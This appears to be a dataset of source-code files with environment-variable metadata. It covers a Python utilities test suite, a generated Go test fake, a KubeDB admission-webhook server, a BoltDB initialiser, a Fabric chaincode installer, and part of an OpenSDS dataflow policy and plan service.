with self.assertRaisesRegexp(zipfile.BadZipfile, f'{not_zip.name}'), open_zip(file_symlink):
pass
@contextmanager
def _stdio_as_tempfiles(self) -> Iterator[None]:
"""Harness to replace `sys.std*` with tempfiles.
Validates that all files are read/written/flushed correctly, and acts as a
contextmanager to allow for recursive tests.
"""
# Prefix contents written within this instance with a unique string to differentiate
# them from other instances.
uuid_str = str(uuid.uuid4())
def u(string: str) -> str:
return f'{uuid_str}#{string}'
stdin_data = u('stdio')
stdout_data = u('stdout')
stderr_data = u('stderr')
with temporary_file(binary_mode=False) as tmp_stdin,\
temporary_file(binary_mode=False) as tmp_stdout,\
temporary_file(binary_mode=False) as tmp_stderr:
print(stdin_data, file=tmp_stdin)
tmp_stdin.seek(0)
# Read prepared content from stdin, and write content to stdout/stderr.
with stdio_as(stdout_fd=tmp_stdout.fileno(),
stderr_fd=tmp_stderr.fileno(),
stdin_fd=tmp_stdin.fileno()):
self.assertEqual(sys.stdin.fileno(), 0)
self.assertEqual(sys.stdout.fileno(), 1)
self.assertEqual(sys.stderr.fileno(), 2)
self.assertEqual(stdin_data, sys.stdin.read().strip())
print(stdout_data, file=sys.stdout)
yield
print(stderr_data, file=sys.stderr)
tmp_stdout.seek(0)
tmp_stderr.seek(0)
self.assertEqual(stdout_data, tmp_stdout.read().strip())
self.assertEqual(stderr_data, tmp_stderr.read().strip())
def test_stdio_as(self) -> None:
self.assertTrue(sys.stderr.fileno() > 2,
f"Expected a pseudofile as stderr, got: {sys.stderr}")
old_stdout, old_stderr, old_stdin = sys.stdout, sys.stderr, sys.stdin
# The first level tests that when `sys.std*` are file-likes (in particular, the ones set up in
# pytest's harness) rather than actual files, we stash and restore them properly.
with self._stdio_as_tempfiles():
# The second level stashes the first level's actual file objects and then re-opens them.
with self._stdio_as_tempfiles():
pass
# Validate that after the second level completes, the first level still sees valid
# fds on `sys.std*`.
self.assertEqual(sys.stdin.fileno(), 0)
self.assertEqual(sys.stdout.fileno(), 1)
self.assertEqual(sys.stderr.fileno(), 2)
self.assertEqual(sys.stdout, old_stdout)
self.assertEqual(sys.stderr, old_stderr)
self.assertEqual(sys.stdin, old_stdin)
def test_stdio_as_dev_null(self) -> None:
# Capture output to tempfiles.
with self._stdio_as_tempfiles():
# Read/write from/to `/dev/null`, which will be validated by the harness as not
# affecting the tempfiles.
with stdio_as(stdout_fd=-1, stderr_fd=-1, stdin_fd=-1):
self.assertEqual('', sys.stdin.read())
print('garbage', file=sys.stdout)
print('garbage', file=sys.stderr)
def test_signal_handler_as(self) -> None:
mock_initial_handler = 1
mock_new_handler = 2
with unittest.mock.patch('signal.signal', **PATCH_OPTS) as mock_signal:
mock_signal.return_value = mock_initial_handler
try:
with signal_handler_as(signal.SIGUSR2, mock_new_handler):
raise NotImplementedError('blah')
except NotImplementedError:
pass
self.assertEqual(mock_signal.call_count, 2)
mock_signal.assert_has_calls([
unittest.mock.call(signal.SIGUSR2, mock_new_handler),
unittest.mock.call(signal.SIGUSR2, mock_initial_handler)
])
def test_permissions(self) -> None:
with temporary_file(permissions=0o700) as f:
self.assertEqual(0o700, os.stat(f.name)[0] & 0o777)
with temporary_dir(permissions=0o644) as path:
self.assertEqual(0o644, os.stat(path)[0] & 0o777)
def test_exception_logging(self) -> None:
fake_logger = unittest.mock.Mock()
with self.assertRaises(AssertionError):
with exception_logging(fake_logger, 'error!'):
assert True is False
fake_logger.exception.assert_called_once_with('error!')
def test_maybe_profiled(self) -> None:
with temporary_dir() as td:
profile_path = os.path.join(td, 'profile.prof')
with maybe_profiled(profile_path):
for _ in range(5):
print('test')
# Ensure the profile data was written.
self.assertTrue(os.path.exists(profile_path))
# Ensure the profile data is valid.
pstats.Stats(profile_path).print_stats()
| [] | [] | [
"USER",
"AAA",
"XXX",
"HORK"
] | [] | ["USER", "AAA", "XXX", "HORK"] | python | 4 | 0 | |
release/resource/resourcefakes/fake_archive_index.go | // Code generated by counterfeiter. DO NOT EDIT.
package resourcefakes
import (
"sync"
"github.com/nttrpf/bosh-cli/release/resource"
)
type FakeArchiveIndex struct {
FindStub func(name, fingerprint string) (string, string, error)
findMutex sync.RWMutex
findArgsForCall []struct {
name string
fingerprint string
}
findReturns struct {
result1 string
result2 string
result3 error
}
findReturnsOnCall map[int]struct {
result1 string
result2 string
result3 error
}
AddStub func(name, fingerprint, path, sha1 string) (string, string, error)
addMutex sync.RWMutex
addArgsForCall []struct {
name string
fingerprint string
path string
sha1 string
}
addReturns struct {
result1 string
result2 string
result3 error
}
addReturnsOnCall map[int]struct {
result1 string
result2 string
result3 error
}
invocations map[string][][]interface{}
invocationsMutex sync.RWMutex
}
func (fake *FakeArchiveIndex) Find(name string, fingerprint string) (string, string, error) {
fake.findMutex.Lock()
ret, specificReturn := fake.findReturnsOnCall[len(fake.findArgsForCall)]
fake.findArgsForCall = append(fake.findArgsForCall, struct {
name string
fingerprint string
}{name, fingerprint})
fake.recordInvocation("Find", []interface{}{name, fingerprint})
fake.findMutex.Unlock()
if fake.FindStub != nil {
return fake.FindStub(name, fingerprint)
}
if specificReturn {
return ret.result1, ret.result2, ret.result3
}
return fake.findReturns.result1, fake.findReturns.result2, fake.findReturns.result3
}
func (fake *FakeArchiveIndex) FindCallCount() int {
fake.findMutex.RLock()
defer fake.findMutex.RUnlock()
return len(fake.findArgsForCall)
}
func (fake *FakeArchiveIndex) FindArgsForCall(i int) (string, string) {
fake.findMutex.RLock()
defer fake.findMutex.RUnlock()
return fake.findArgsForCall[i].name, fake.findArgsForCall[i].fingerprint
}
func (fake *FakeArchiveIndex) FindReturns(result1 string, result2 string, result3 error) {
fake.FindStub = nil
fake.findReturns = struct {
result1 string
result2 string
result3 error
}{result1, result2, result3}
}
func (fake *FakeArchiveIndex) FindReturnsOnCall(i int, result1 string, result2 string, result3 error) {
fake.FindStub = nil
if fake.findReturnsOnCall == nil {
fake.findReturnsOnCall = make(map[int]struct {
result1 string
result2 string
result3 error
})
}
fake.findReturnsOnCall[i] = struct {
result1 string
result2 string
result3 error
}{result1, result2, result3}
}
func (fake *FakeArchiveIndex) Add(name string, fingerprint string, path string, sha1 string) (string, string, error) {
fake.addMutex.Lock()
ret, specificReturn := fake.addReturnsOnCall[len(fake.addArgsForCall)]
fake.addArgsForCall = append(fake.addArgsForCall, struct {
name string
fingerprint string
path string
sha1 string
}{name, fingerprint, path, sha1})
fake.recordInvocation("Add", []interface{}{name, fingerprint, path, sha1})
fake.addMutex.Unlock()
if fake.AddStub != nil {
return fake.AddStub(name, fingerprint, path, sha1)
}
if specificReturn {
return ret.result1, ret.result2, ret.result3
}
return fake.addReturns.result1, fake.addReturns.result2, fake.addReturns.result3
}
func (fake *FakeArchiveIndex) AddCallCount() int {
fake.addMutex.RLock()
defer fake.addMutex.RUnlock()
return len(fake.addArgsForCall)
}
func (fake *FakeArchiveIndex) AddArgsForCall(i int) (string, string, string, string) {
fake.addMutex.RLock()
defer fake.addMutex.RUnlock()
return fake.addArgsForCall[i].name, fake.addArgsForCall[i].fingerprint, fake.addArgsForCall[i].path, fake.addArgsForCall[i].sha1
}
func (fake *FakeArchiveIndex) AddReturns(result1 string, result2 string, result3 error) {
fake.AddStub = nil
fake.addReturns = struct {
result1 string
result2 string
result3 error
}{result1, result2, result3}
}
func (fake *FakeArchiveIndex) AddReturnsOnCall(i int, result1 string, result2 string, result3 error) {
fake.AddStub = nil
if fake.addReturnsOnCall == nil {
fake.addReturnsOnCall = make(map[int]struct {
result1 string
result2 string
result3 error
})
}
fake.addReturnsOnCall[i] = struct {
result1 string
result2 string
result3 error
}{result1, result2, result3}
}
func (fake *FakeArchiveIndex) Invocations() map[string][][]interface{} {
fake.invocationsMutex.RLock()
defer fake.invocationsMutex.RUnlock()
fake.findMutex.RLock()
defer fake.findMutex.RUnlock()
fake.addMutex.RLock()
defer fake.addMutex.RUnlock()
copiedInvocations := map[string][][]interface{}{}
for key, value := range fake.invocations {
copiedInvocations[key] = value
}
return copiedInvocations
}
func (fake *FakeArchiveIndex) recordInvocation(key string, args []interface{}) {
fake.invocationsMutex.Lock()
defer fake.invocationsMutex.Unlock()
if fake.invocations == nil {
fake.invocations = map[string][][]interface{}{}
}
if fake.invocations[key] == nil {
fake.invocations[key] = [][]interface{}{}
}
fake.invocations[key] = append(fake.invocations[key], args)
}
var _ resource.ArchiveIndex = new(FakeArchiveIndex)
| [] | [] | [] | [] | [] | go | null | null | null |
pkg/server/server.go | package server
import (
"fmt"
"os"
"strings"
hooks "github.com/appscode/kubernetes-webhook-util/admission/v1beta1"
admissionreview "github.com/appscode/kubernetes-webhook-util/registry/admissionreview/v1beta1"
reg_util "github.com/appscode/kutil/admissionregistration/v1beta1"
dynamic_util "github.com/appscode/kutil/dynamic"
api "github.com/kubedb/apimachinery/apis/kubedb/v1alpha1"
"github.com/kubedb/apimachinery/pkg/admission/dormantdatabase"
"github.com/kubedb/apimachinery/pkg/admission/namespace"
"github.com/kubedb/apimachinery/pkg/admission/snapshot"
"github.com/kubedb/apimachinery/pkg/eventer"
esAdmsn "github.com/kubedb/elasticsearch/pkg/admission"
edAdmsn "github.com/kubedb/etcd/pkg/admission"
mcAdmsn "github.com/kubedb/memcached/pkg/admission"
mgAdmsn "github.com/kubedb/mongodb/pkg/admission"
myAdmsn "github.com/kubedb/mysql/pkg/admission"
"github.com/kubedb/operator/pkg/controller"
pgAdmsn "github.com/kubedb/postgres/pkg/admission"
rdAdmsn "github.com/kubedb/redis/pkg/admission"
admission "k8s.io/api/admission/v1beta1"
core "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/apimachinery/pkg/runtime/serializer"
"k8s.io/apimachinery/pkg/version"
"k8s.io/apiserver/pkg/registry/rest"
genericapiserver "k8s.io/apiserver/pkg/server"
"k8s.io/client-go/kubernetes"
)
const (
apiserviceName = "v1alpha1.validators.kubedb.com"
)
var (
Scheme = runtime.NewScheme()
Codecs = serializer.NewCodecFactory(Scheme)
)
func init() {
admission.AddToScheme(Scheme)
// we need to add the options to empty v1
// TODO fix the server code to avoid this
metav1.AddToGroupVersion(Scheme, schema.GroupVersion{Version: "v1"})
// TODO: keep the generic API server from wanting this
unversioned := schema.GroupVersion{Group: "", Version: "v1"}
Scheme.AddUnversionedTypes(unversioned,
&metav1.Status{},
&metav1.APIVersions{},
&metav1.APIGroupList{},
&metav1.APIGroup{},
&metav1.APIResourceList{},
)
}
type KubeDBServerConfig struct {
GenericConfig *genericapiserver.RecommendedConfig
ExtraConfig ExtraConfig
OperatorConfig *controller.OperatorConfig
}
type ExtraConfig struct {
AdmissionHooks []hooks.AdmissionHook
}
// KubeDBServer contains state for a Kubernetes cluster master/api server.
type KubeDBServer struct {
GenericAPIServer *genericapiserver.GenericAPIServer
Operator *controller.Controller
}
func (op *KubeDBServer) Run(stopCh <-chan struct{}) error {
go op.Operator.Run(stopCh)
return op.GenericAPIServer.PrepareRun().Run(stopCh)
}
type completedConfig struct {
GenericConfig genericapiserver.CompletedConfig
ExtraConfig ExtraConfig
OperatorConfig *controller.OperatorConfig
}
type CompletedConfig struct {
// Embed a private pointer that cannot be instantiated outside of this package.
*completedConfig
}
// Complete fills in any fields not set that are required to have valid data. It's mutating the receiver.
func (c *KubeDBServerConfig) Complete() CompletedConfig {
completedCfg := completedConfig{
c.GenericConfig.Complete(),
c.ExtraConfig,
c.OperatorConfig,
}
completedCfg.GenericConfig.Version = &version.Info{
Major: "1",
Minor: "1",
}
return CompletedConfig{&completedCfg}
}
// New returns a new instance of KubeDBServer from the given config.
func (c completedConfig) New() (*KubeDBServer, error) {
genericServer, err := c.GenericConfig.New("pack-server", genericapiserver.NewEmptyDelegate()) // completion is done in Complete, no need for a second time
if err != nil {
return nil, err
}
if c.OperatorConfig.EnableMutatingWebhook {
c.ExtraConfig.AdmissionHooks = []hooks.AdmissionHook{
&mgAdmsn.MongoDBMutator{},
&myAdmsn.MySQLMutator{},
&pgAdmsn.PostgresMutator{},
&esAdmsn.ElasticsearchMutator{},
&edAdmsn.EtcdMutator{},
&rdAdmsn.RedisMutator{},
&mcAdmsn.MemcachedMutator{},
}
}
if c.OperatorConfig.EnableValidatingWebhook {
c.ExtraConfig.AdmissionHooks = append(c.ExtraConfig.AdmissionHooks,
&mgAdmsn.MongoDBValidator{},
&snapshot.SnapshotValidator{},
&dormantdatabase.DormantDatabaseValidator{},
&myAdmsn.MySQLValidator{},
&pgAdmsn.PostgresValidator{},
&esAdmsn.ElasticsearchValidator{},
&edAdmsn.EtcdValidator{},
&rdAdmsn.RedisValidator{},
&mcAdmsn.MemcachedValidator{},
&namespace.NamespaceValidator{
Resources: []string{
api.ResourcePluralElasticsearch,
api.ResourcePluralEtcd,
api.ResourcePluralMemcached,
api.ResourcePluralMongoDB,
api.ResourcePluralMySQL,
api.ResourcePluralPostgres,
api.ResourcePluralRedis,
},
})
}
ctrl, err := c.OperatorConfig.New()
if err != nil {
return nil, err
}
s := &KubeDBServer{
GenericAPIServer: genericServer,
Operator: ctrl,
}
for _, versionMap := range admissionHooksByGroupThenVersion(c.ExtraConfig.AdmissionHooks...) {
// TODO we're going to need a later k8s.io/apiserver so that we can get discovery to list a different group version for
// our endpoint which we'll use to back some custom storage which will consume the AdmissionReview type and give back the correct response
apiGroupInfo := genericapiserver.APIGroupInfo{
VersionedResourcesStorageMap: map[string]map[string]rest.Storage{},
// TODO unhardcode this. It was hardcoded before, but we need to re-evaluate
OptionsExternalVersion: &schema.GroupVersion{Version: "v1"},
Scheme: Scheme,
ParameterCodec: metav1.ParameterCodec,
NegotiatedSerializer: Codecs,
}
for _, admissionHooks := range versionMap {
for i := range admissionHooks {
admissionHook := admissionHooks[i]
admissionResource, _ := admissionHook.Resource()
admissionVersion := admissionResource.GroupVersion()
// just overwrite the groupversion with a random one. We don't really care or know.
apiGroupInfo.PrioritizedVersions = appendUniqueGroupVersion(apiGroupInfo.PrioritizedVersions, admissionVersion)
admissionReview := admissionreview.NewREST(admissionHook.Admit)
v1alpha1storage, ok := apiGroupInfo.VersionedResourcesStorageMap[admissionVersion.Version]
if !ok {
v1alpha1storage = map[string]rest.Storage{}
}
v1alpha1storage[admissionResource.Resource] = admissionReview
apiGroupInfo.VersionedResourcesStorageMap[admissionVersion.Version] = v1alpha1storage
}
}
if err := s.GenericAPIServer.InstallAPIGroup(&apiGroupInfo); err != nil {
return nil, err
}
}
for i := range c.ExtraConfig.AdmissionHooks {
admissionHook := c.ExtraConfig.AdmissionHooks[i]
postStartName := postStartHookName(admissionHook)
if len(postStartName) == 0 {
continue
}
s.GenericAPIServer.AddPostStartHookOrDie(postStartName,
func(context genericapiserver.PostStartHookContext) error {
return admissionHook.Initialize(c.OperatorConfig.ClientConfig, context.StopCh)
},
)
}
if c.OperatorConfig.EnableValidatingWebhook {
s.GenericAPIServer.AddPostStartHookOrDie("validating-webhook-xray",
func(context genericapiserver.PostStartHookContext) error {
go func() {
xray := reg_util.NewCreateValidatingWebhookXray(c.OperatorConfig.ClientConfig, apiserviceName, &api.Redis{
TypeMeta: metav1.TypeMeta{
APIVersion: api.SchemeGroupVersion.String(),
Kind: api.ResourceKindRedis,
},
ObjectMeta: metav1.ObjectMeta{
Name: "test-redis-for-webhook-xray",
Namespace: "default",
},
Spec: api.RedisSpec{
StorageType: api.StorageType("Invalid"),
},
}, context.StopCh)
if err := xray.IsActive(); err != nil {
w, _, e2 := dynamic_util.DetectWorkload(
c.OperatorConfig.ClientConfig,
core.SchemeGroupVersion.WithResource("pods"),
os.Getenv("MY_POD_NAMESPACE"),
os.Getenv("MY_POD_NAME"))
if e2 == nil {
eventer.CreateEventWithLog(
kubernetes.NewForConfigOrDie(c.OperatorConfig.ClientConfig),
"kubedb-operator",
w,
core.EventTypeWarning,
eventer.EventReasonAdmissionWebhookNotActivated,
err.Error())
}
panic(err)
}
}()
return nil
},
)
}
return s, nil
}
func appendUniqueGroupVersion(slice []schema.GroupVersion, elems ...schema.GroupVersion) []schema.GroupVersion {
m := map[schema.GroupVersion]bool{}
for _, gv := range slice {
m[gv] = true
}
for _, e := range elems {
m[e] = true
}
out := make([]schema.GroupVersion, 0, len(m))
for gv := range m {
out = append(out, gv)
}
return out
}
func postStartHookName(hook hooks.AdmissionHook) string {
var ns []string
gvr, _ := hook.Resource()
ns = append(ns, fmt.Sprintf("admit-%s.%s.%s", gvr.Resource, gvr.Version, gvr.Group))
if len(ns) == 0 {
return ""
}
return strings.Join(append(ns, "init"), "-")
}
func admissionHooksByGroupThenVersion(admissionHooks ...hooks.AdmissionHook) map[string]map[string][]hooks.AdmissionHook {
ret := map[string]map[string][]hooks.AdmissionHook{}
for i := range admissionHooks {
hook := admissionHooks[i]
gvr, _ := hook.Resource()
group, ok := ret[gvr.Group]
if !ok {
group = map[string][]hooks.AdmissionHook{}
ret[gvr.Group] = group
}
group[gvr.Version] = append(group[gvr.Version], hook)
}
return ret
}
| [
"\"MY_POD_NAMESPACE\"",
"\"MY_POD_NAME\""
] | [] | [
"MY_POD_NAME",
"MY_POD_NAMESPACE"
] | [] | ["MY_POD_NAME", "MY_POD_NAMESPACE"] | go | 2 | 0 | |
pkg/model/model.go | package model
// modeled after
// https://www.opsdash.com/blog/persistent-key-value-store-golang.html
import (
"errors"
"os"
"time"
"github.com/LassoProject/lasso/pkg/cfg"
log "github.com/Sirupsen/logrus"
"github.com/boltdb/bolt"
)
var (
// ErrNotFound is returned when the key supplied to a Get or Delete
// method does not exist in the database.
ErrNotFound = errors.New("key not found")
// ErrBadValue is returned when the value supplied to the Put method
// is nil.
ErrBadValue = errors.New("bad value")
//Db holds the db
Db *bolt.DB
dbpath string
userBucket = []byte("users")
teamBucket = []byte("teams")
siteBucket = []byte("sites")
)
// may want to use encode/gob to store the user record
func init() {
dbpath = os.Getenv("LASSO_ROOT") + cfg.Cfg.DB.File
Db, _ = OpenDB(dbpath)
}
// OpenDB the boltdb
func OpenDB(dbfile string) (*bolt.DB, error) {
opts := &bolt.Options{
Timeout: 50 * time.Millisecond,
}
db, err := bolt.Open(dbfile, 0644, opts)
if err != nil {
log.Fatal(err)
return nil, err
}
return db, nil
}
func getBucket(tx *bolt.Tx, key []byte) *bolt.Bucket {
b, err := tx.CreateBucketIfNotExists(key)
if err != nil {
log.Errorf("could not create bucket in db %s", err)
log.Errorf("check the dbfile permissions at %s", dbpath)
log.Errorf("if there's really something wrong with the data ./do.sh includes a utility to browse the dbfile")
return nil
}
return b
}
| [
"\"LASSO_ROOT\""
] | [] | [
"LASSO_ROOT"
] | [] | ["LASSO_ROOT"] | go | 1 | 0 | |
sdkconnector/installcc.go | package sdkconnector
import (
"os"
"github.com/hyperledger/fabric-sdk-go/pkg/client/resmgmt"
"github.com/hyperledger/fabric-sdk-go/pkg/common/errors/retry"
packager "github.com/hyperledger/fabric-sdk-go/pkg/fab/ccpackager/gopackager"
"github.com/hyperledger/fabric-sdk-go/pkg/fabsdk"
)
//InstallCC packages and installs chaincode on the given peer.
func InstallCC(setup *OrgSetup, chaincodePath string, chaincodeName string, chaincodeVersion string, peerURL string) error {
resourceManagerClientContext := setup.sdk.Context(fabsdk.WithUser(setup.AdminName), fabsdk.WithOrg(setup.OrgName))
resMgmtClient, err := resmgmt.New(resourceManagerClientContext)
if err != nil {
return err
}
ccPkg, err := packager.NewCCPackage(chaincodePath, os.Getenv("GOPATH"))
if err != nil {
return err
}
installCCReq := resmgmt.InstallCCRequest{Name: chaincodeName, Path: chaincodePath, Version: chaincodeVersion, Package: ccPkg}
_, err = resMgmtClient.InstallCC(installCCReq, resmgmt.WithRetry(retry.DefaultResMgmtOpts), resmgmt.WithTargetFilter(&urlTargetFilter{url: peerURL}))
if err != nil {
return err
}
return nil
}
| [
"\"GOPATH\""
] | [] | [
"GOPATH"
] | [] | ["GOPATH"] | go | 1 | 0 | |
dataflow/pkg/service.go | package pkg
import (
"context"
"github.com/micro/go-log"
pb "github.com/opensds/go-panda/dataflow/proto"
"github.com/opensds/go-panda/dataflow/pkg/policy"
"github.com/opensds/go-panda/dataflow/pkg/plan"
"github.com/opensds/go-panda/dataflow/pkg/type"
"github.com/opensds/go-panda/dataflow/pkg/db"
. "github.com/opensds/go-panda/dataflow/pkg/utils"
"os"
"encoding/json"
"github.com/globalsign/mgo/bson"
"github.com/opensds/go-panda/dataflow/pkg/job"
"github.com/opensds/go-panda/datamover/proto"
"errors"
)
type dataflowService struct{
datamoverClient datamover.DatamoverService
}
func NewDataFlowService(datamover datamover.DatamoverService) pb.DataFlowHandler {
host := os.Getenv("DB_HOST")
dbstor := Database{Credential:"unkonwn", Driver:"mongodb", Endpoint:host}
db.Init(&dbstor)
return &dataflowService{datamoverClient: datamover}
}
func (b *dataflowService) GetPolicy(ctx context.Context, in *pb.GetPolicyRequest, out *pb.GetPolicyResponse) error {
log.Log("Get policy is called in dataflow service.")
name := in.GetName()
if name == "" {
out.Err = "No name provided."
return errors.New("No name provided.")
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
pols,err := policy.Get(name, tenant)
if err == nil {
out.Err = ""
}else {
out.Err = err.Error()
}
log.Logf("Getpolicy err:%s.", out.Err)
//log.Logf("Getpolicy err:%d\n", rsp.ErrCode)
if err == nil {
for i := 0; i < len(pols); i++ {
p := pb.Policy{Id:string(pols[i].Id.Hex()), Name:pols[i].Name, Tenant:pols[i].Tenant,
Description:pols[i].Description}
sched := pb.Schedule{Type:pols[i].Schedule.Type, TimePoint:pols[i].Schedule.TimePoint}
for j := 0; j < len(pols[i].Schedule.Day); j++ {
sched.Days = append(sched.Days, pols[i].Schedule.Day[j])
}
p.Schedule = &sched
out.Pols = append(out.Pols, &p)
}
}
//For debug -- begin
jsons1, errs1 := json.Marshal(out)
if errs1 != nil {
log.Logf(errs1.Error())
}else {
log.Logf("jsons1: %s.\n", jsons1)
}
//For debug -- end
return err
}
func (b *dataflowService) CreatePolicy(ctx context.Context, in *pb.CreatePolicyRequest, out *pb.CreatePolicyResponse) error {
log.Log("Create policy is called in dataflow service.")
pol := _type.Policy{}
pol.Name = in.Pol.GetName()
//TODO:how to get tenant
//pol.Tenant = in.Pol.GetTenant()
pol.Tenant = "tenant"
pol.Description = in.Pol.GetDescription()
if in.Pol.GetSchedule() != nil {
pol.Schedule.Day = in.Pol.Schedule.Days
pol.Schedule.TimePoint = in.Pol.Schedule.TimePoint
pol.Schedule.Type = in.Pol.Schedule.Type
pol.Schedule.TriggerProperties = in.Pol.Schedule.TiggerProperties
}else {
out.Err = "Get schedule failed."
return errors.New("Get schedule failed.")
}
if pol.Name == "" {
out.Err = "no name provided."
return errors.New("Get schedule failed.")
}
//rsp := pb.CreatePolicyResponse{}
err := policy.Create(&pol)
if err == nil {
out.PolId = string(pol.Id.Hex())
out.Err = ""
}else {
out.Err = err.Error()
}
log.Logf("Create policy err:%s.", out.Err)
return err
}
func (b *dataflowService) DeletePolicy(ctx context.Context, in *pb.DeletePolicyRequest, out *pb.DeletePolicyResponse) error {
log.Log("Delete policy is called in dataflow service.")
//out.Id = "c506cd4b-9048-43bc-97ef-0d7dec369b42"
//out.Name = "GetPolicy." + in.Id
id := in.GetId()
if id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
err := policy.Delete(id, tenant)
if err == nil {
out.Err = ""
}else {
out.Err = err.Error()
}
log.Logf("Delete policy err:%s.", out.Err)
return err
}
func (b *dataflowService) UpdatePolicy(ctx context.Context, in *pb.UpdatePolicyRequest, out *pb.UpdatePolicyResponse) error {
log.Log("Update policy is called in dataflow service.")
pol := _type.Policy{}
if in.Pol.GetId() == "" {
out.Err = "No id provided."
return errors.New("No id provided.")
}
pol.Id = bson.ObjectIdHex(in.Pol.Id)
if pol.Id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
pol.Name = in.Pol.GetName()
//TODO: how to get tenant
//pol.Tenant = in.Pol.GetTenant()
pol.Tenant = "tenant"
pol.Description = in.Pol.GetDescription()
if in.Pol.GetSchedule() != nil {
pol.Schedule.Day = in.Pol.Schedule.Days
pol.Schedule.TimePoint = in.Pol.Schedule.TimePoint
pol.Schedule.Type = in.Pol.Schedule.Type
}
//rsp := pb.CreatePolicyResponse{}
err := policy.Update(&pol)
if err == nil {
out.Err = ""
out.PolId = string(pol.Id.Hex())
}else {
out.Err = err.Error()
}
log.Logf("Update policy finished, err:%s", out.Err)
return err
}
func fillRspConnector (out *pb.Connector, in *_type.Connector) {
switch in.StorType {
case _type.STOR_TYPE_OPENSDS:
out.BucketName = in.BucketName
default:
log.Logf("Not support connector type:%v\n", in.StorType)
}
}
func (b *dataflowService) GetPlan(ctx context.Context, in *pb.GetPlanRequest, out *pb.GetPlanResponse) error {
log.Log("Get plan is called in dataflow service.")
name := in.GetName()
if name == ""{
out.Err = "No name specified."
return errors.New("No name specified.")
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
pls,err := plan.Get(name, tenant)
if err == nil {
out.Err = ""
}else {
out.Err = err.Error()
}
log.Logf("Get plan err:%s.", out.Err)
//log.Logf("Getpolicy err:%d\n", rsp.ErrCode)
if err == nil {
for i := 0; i < len(pls); i++ {
pl := pb.Plan{Id:string(pls[i].Id.Hex()), Name:pls[i].Name, Description:pls[i].Description,
Type:pls[i].Type, PolicyId:pls[i].PolicyId, PolicyName:pls[i].PolicyName,
OverWrite:pls[i].OverWrite, RemainSource:pls[i].RemainSource, Tenant:pls[i].Tenant}
srcConn := pb.Connector{StorType:pls[i].SourceConn.StorType}
fillRspConnector(&srcConn, &pls[i].SourceConn)
destConn := pb.Connector{StorType:pls[i].DestConn.StorType}
fillRspConnector(&destConn, &pls[i].DestConn)
filt := pb.Filter{Prefix:pls[i].Filt.Prefix}
for j := 0; j < len(pls[i].Filt.Tag); j++ {
t := pb.KV{Key:pls[i].Filt.Tag[j].Key, Value:pls[i].Filt.Tag[j].Value}
filt.Tag = append(filt.Tag, &t)
}
pl.SourceConn = &srcConn
pl.DestConn = &destConn
pl.Filt = &filt
out.Plans = append(out.Plans, &pl)
}
}
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
log.Logf(errs.Error())
}else {
log.Logf("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
func fillReqConnector (out *_type.Connector, in *pb.Connector) error {
switch in.StorType {
case _type.STOR_TYPE_OPENSDS:
out.BucketName = in.BucketName
return nil
default:
log.Logf("Not support connector type:%v\n", in.StorType)
return errors.New("Invalid connector type.")
}
}
func (b *dataflowService) CreatePlan(ctx context.Context, in *pb.CreatePlanRequest, out *pb.CreatePlanResponse) error {
log.Log("Create plan is called in dataflow service.")
pl := _type.Plan{}
pl.Name = in.Plan.GetName()
//TODO:get tenant
//pl.Tenant = in.Plan.GetTenant()
pl.Tenant = "tenant"
pl.Description = in.Plan.GetDescription()
pl.Type = in.Plan.GetType()
pl.OverWrite = in.Plan.GetOverWrite()
pl.RemainSource = in.Plan.GetRemainSource()
pl.PolicyId = in.Plan.GetPolicyId()
//pl.PolicyName = in.Plan.GetPolicyName()
if in.Plan.GetSourceConn() != nil {
srcConn := _type.Connector{StorType:in.Plan.SourceConn.StorType}
err := fillReqConnector(&srcConn, in.Plan.SourceConn)
if err == nil {
pl.SourceConn = srcConn
}else {
return err
}
}else {
out.Err = "Get source connector failed."
return errors.New("Invalid source connector.")
}
if in.Plan.GetDestConn() != nil {
destConn := _type.Connector{StorType:in.Plan.DestConn.StorType}
err := fillReqConnector(&destConn, in.Plan.DestConn)
if err == nil {
pl.DestConn = destConn
}else {
out.Err = err.Error()
return err
}
}else {
out.Err = "Get destination connector failed."
return errors.New("Invalid destination connector.")
}
if in.Plan.GetFilt() != nil {
if in.Plan.Filt.Prefix != "" {
pl.Filt = _type.Filter{Prefix:in.Plan.Filt.Prefix}
}
if len(in.Plan.Filt.Tag) > 0 {
for j := 0; j < len(in.Plan.Filt.Tag); j++ {
pl.Filt.Tag = append(pl.Filt.Tag, _type.KeyValue{Key:in.Plan.Filt.Tag[j].Key, Value:in.Plan.Filt.Tag[j].Value})
}
}
}else {
pl.Filt = _type.Filter{Prefix:"/"} //this is default
}
if pl.Name == "" || pl.Type == "" {
out.Err = "Name or type is null."
return errors.New("Name or type is null.")
}
//rsp := pb.CreatePolicyResponse{}
log.Logf("plan:%+v\n", pl)
err := plan.Create(&pl, b.datamoverClient)
if err == nil {
out.Err = ""
out.PlanId = string(pl.Id.Hex())
}else {
out.Err = err.Error()
}
log.Logf("Create plan err:%s.", out.Err)
return err
}
func (b *dataflowService) DeletePlan(ctx context.Context, in *pb.DeletePlanRequest, out *pb.DeletePlanResponse) error {
log.Log("Delete plan is called in dataflow service.")
//out.Id = "c506cd4b-9048-43bc-97ef-0d7dec369b42"
//out.Name = "GetPolicy." + in.Id
id := in.GetId()
if id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
err := plan.Delete(id, tenant)
if err == nil {
out.Err = ""
}else {
out.Err = err.Error()
}
log.Logf("Delete plan err:%s.", out.Err)
return err
}
func (b *dataflowService) UpdatePlan(ctx context.Context, in *pb.UpdatePlanRequest, out *pb.UpdatePlanResponse) error {
log.Log("Update plan is called in dataflow service.")
pl := _type.Plan{}
if in.Plan.GetId() == "" {
out.Err = "No id provided."
return errors.New("No id provided.")
}
pl.Id = bson.ObjectIdHex(in.Plan.GetId())
pl.Name = in.Plan.GetName()
pl.Description = in.Plan.GetDescription()
pl.Type = in.Plan.GetType()
pl.OverWrite = in.Plan.GetOverWrite()
